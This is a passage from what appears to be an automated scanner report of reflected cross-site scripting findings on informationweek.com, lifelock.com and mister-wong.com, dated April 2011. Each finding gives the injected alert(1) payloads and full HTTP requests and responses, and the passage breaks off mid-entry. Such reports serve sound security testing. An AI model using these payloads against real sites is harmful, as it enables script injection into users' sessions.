<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--
s.pageName="";
s.server="";
s.channel="informationweek.com/indexb5608"-alert(1)-"9829f497abd840a41";
s.pageType="errorPage";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="173.193.214.243 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534
...[SNIP]...

2.60. http://www.informationweek.com/index/welcome [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /index/welcome

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd82"><script>alert(1)</script>d594c72fda68b16a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /indexcfd82"><script>alert(1)</script>d594c72fda68b16a9/welcome?redirectTo=http%3A%2F%2Fwww.informationweek.com%2Fnews%2Fsecurity%2Fattacks%2F229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
Origin: http://www.informationweek.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r53i3a4pci5b1m403nc5srhq54; s_cc=true; s_nr=1303613720292; s_lv=1303613720293; s_lv_s=First%20Visit; us_ubm_aut=3-1; s_sq=%5B%5BB%5D%5D; iwkbtn_dell_110423b=5654655173|1303613724356

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:17:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:17:19 GMT
Content-Type: text/html
Content-Length: 32722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/indexcfd82"><script>alert(1)</script>d594c72fda68b16a9/welc;kvarticleid=;kauthor=;loc=300;grp=560629045;" target="_blank">
...[SNIP]...

2.61. http://www.informationweek.com/index/welcome [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /index/welcome

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a06c"><script>alert(1)</script>3049035ccd1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /index/welcome9a06c"><script>alert(1)</script>3049035ccd1 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
Origin: http://www.informationweek.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r53i3a4pci5b1m403nc5srhq54; s_cc=true; s_nr=1303613720292; s_lv=1303613720293; s_lv_s=First%20Visit; us_ubm_aut=3-1; s_sq=%5B%5BB%5D%5D; iwkbtn_dell_110423b=5654655173|1303613724356
Content-Length: 87

redirectTo=http%3A%2F%2Fwww.informationweek.com%2Fnews%2Fsecurity%2Fattacks%2F229402094

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:17:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 32493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/index/welcome9a06c"><script>alert(1)</script>3049035ccd1;kvarticleid=;kauthor=;loc=300;grp=635560724;" target="_blank">
...[SNIP]...

2.62. http://www.informationweek.com/index/welcome [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /index/welcome

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f343'-alert(1)-'aacdbbd961676d23c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/welcome8f343'-alert(1)-'aacdbbd961676d23c?redirectTo=http%3A%2F%2Fwww.informationweek.com%2Fnews%2Fsecurity%2Fattacks%2F229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
Origin: http://www.informationweek.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r53i3a4pci5b1m403nc5srhq54; s_cc=true; s_nr=1303613720292; s_lv=1303613720293; s_lv_s=First%20Visit; us_ubm_aut=3-1; s_sq=%5B%5BB%5D%5D; iwkbtn_dell_110423b=5654655173|1303613724356

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:17:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 32554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/index/welcome8f343'-alert(1)-'aacdbbd961676d23c;kvarticleid=;kauthor=;loc=100;target=_blank;grp=434087862;misc='+new Date().getTime()+'">
...[SNIP]...

2.63. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/attacks/229402094

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 366bd"-alert(1)-"ffc1f1a20a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news366bd"-alert(1)-"ffc1f1a20a6/security/attacks/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:15:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=qm7qgkktq79sjpg0ifnniivmk7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:10 GMT
Content-Type: text/html
Content-Length: 32725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--
s.pageName="";
s.server="";
s.channel="informationweek.com/news366bd"-alert(1)-"ffc1f1a20a6";
s.pageType="errorPage";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="173.193.214.243 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534
...[SNIP]...

2.64. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/attacks/229402094

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ee7"><script>alert(1)</script>dd771e651e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsb4ee7"><script>alert(1)</script>dd771e651e7/security/attacks/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:15:08 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=d94l2jjo73fn0ekouh86pg4mk0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:08 GMT
Content-Type: text/html
Content-Length: 32721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsb4ee7"><script>alert(1)</script>dd771e651e7/security/at;kvarticleid=;kauthor=;loc=300;grp=994970926;" target="_blank">
...[SNIP]...

2.65. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/attacks/229402094

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbd2b'%3balert(1)//b3ccf1b55bd was submitted in the REST URL parameter 2. This input was echoed as cbd2b';alert(1)//b3ccf1b55bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/securitycbd2b'%3balert(1)//b3ccf1b55bd/attacks/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:15:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=inegnghvgvcck4qlggud5ibj87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:19 GMT
Content-Type: text/html
Content-Length: 92678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--
function launcher(art_id) {
uri = "/email?articleUrl=" + '/news/securitycbd2b';alert(1)//b3ccf1b55bd/attacks/' + art_id;
window.open(uri,"","toolbar=no,scrollbars=auto,location=no,status=no,width=733,height=590,resizable=1")
}
//-->
...[SNIP]...

2.66. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/attacks/229402094

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d09f"><script>alert(1)</script>4c2297b99c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security4d09f"><script>alert(1)</script>4c2297b99c1/attacks/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:15:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=nlg3kbi9dh504uk0h6333ujhf1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:13 GMT
Content-Type: text/html
Content-Length: 93126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_Attacks_Breaches_Welcome_Ad_1x1;key=229402094+/news/security4d09f"><script>alert(1)</script>4c2297b99c1/at;kvarticleid=229402094;kauthor=Mathew J. Schwartz;loc=300;grp=877408906;" target="_blank">
...[SNIP]...

2.67. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/attacks/229402094

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24e0b"><script>alert(1)</script>572ee684acc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security/attacks24e0b"><script>alert(1)</script>572ee684acc/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:15:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=ppp9urc3g19prf466mr52r6fc7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:23 GMT
Content-Type: text/html
Content-Length: 93126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
s_button_stumbleupon at300b" href="http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=InformationWeek&source=tbx-250&lng=en-US&s=stumbleupon&url=www.informationweek.com/news/security/attacks24e0b"><script>alert(1)</script>572ee684acc/229402094&title=Hacking Becomes Leading Cause Of Data Breaches -- InformationWeek&ate=AT-InformationWeek/-/-/4d22a657185bdbc2/1&sms_ss=1&at_xt=1&CXNID=2000001.5215456080540439074NXC&pre=www.informatio
...[SNIP]...

2.68. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/attacks/229402094

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a4de'%3balert(1)//79f1e066e0e was submitted in the REST URL parameter 3. This input was echoed as 2a4de';alert(1)//79f1e066e0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/security/attacks2a4de'%3balert(1)//79f1e066e0e/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:15:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=3c2i976buj0dmk5p87qdd19vp0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:29 GMT
Content-Type: text/html
Content-Length: 92678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--
function launcher(art_id) {
uri = "/email?articleUrl=" + '/news/security/attacks2a4de';alert(1)//79f1e066e0e/' + art_id;
window.open(uri,"","toolbar=no,scrollbars=auto,location=no,status=no,width=733,height=590,resizable=1")
}
//-->
...[SNIP]...

2.69. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/attacks/229402094

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1866f'-alert(1)-'296c5fdde43 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/security/attacks/2294020941866f'-alert(1)-'296c5fdde43 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 24 Apr 2011 03:15:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=g706l130c1f9j77vijc46u02j0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:42 GMT
Connection: close
Content-Type: text/html
Content-Length: 34690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_2294020941866f_alert(1)_296c5fdde43_Welcome_Ad_1x1;key=/news/security/attacks/2294020941866f'-alert(1)-'296c5fdde43;kvarticleid=;kauthor=;loc=100;target=_blank;grp=102156422;misc='+new Date().getTime()+'">
...[SNIP]...

2.70. http://www.informationweek.com/news/security/attacks/229402094 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.informationweek.com
Path:   /news/security/attacks/229402094

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92353"><a>cdbf7e70e0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/security/attacks/22940209492353"><a>cdbf7e70e0d HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 24 Apr 2011 03:15:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=4e5uadiju22sc0a87k7ii7e9r5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:32 GMT
Connection: close
Content-Type: text/html
Content-Length: 34642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_22940209492353&gt;&lt;a&gt;cdbf7e70e0d_Welcome_Ad_1x1;key=/news/security/attacks/22940209492353"><a>cdbf7e70e0d;kvarticleid=;kauthor=;loc=300;grp=446033672;" target="_blank">
...[SNIP]...

2.71. http://www.lifelock.com/ [promocode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e581"><script>alert(1)</script>1b0afbbb73d was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?promocode=GOOGSEARCH135e581"><script>alert(1)</script>1b0afbbb73d&c3metrics=3114&gclid=CNG9kumTtKgCFUNd5Qod6WW7Cw HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:17 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; path=/
Set-Cookie: TSceba2f=4ee5d6ac813b14f64e95997cc31b010cba1ee59097127c8e4db39679; Path=/
Vary: Accept-Encoding
Connection: close

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=GOOGSEARCH135e581"><script>alert(1)</script>1b0afbbb73d" class="enroll-now">
...[SNIP]...

2.72. http://www.mister-wong.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0912"><img%20src%3da%20onerror%3dalert(1)>1155d91a54e was submitted in the REST URL parameter 1. This input was echoed as e0912"><img src=a onerror=alert(1)>1155d91a54e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index.phpe0912"><img%20src%3da%20onerror%3dalert(1)>1155d91a54e HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 14:27:40 GMT
Server: Apache
Set-Cookie: wongsess=65fa81b50439e24c66611f40a38c133b; expires=Tue, 22-Apr-2036 20:27:40 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Content-Length: 5168
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<div id="main" class="c_index.phpe0912"><img src=a onerror=alert(1)>1155d91a54e">
...[SNIP]...

2.73. http://www.nextadvisor.com/identity_theft_protection_services/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /identity_theft_protection_services/index.php

Issue detail

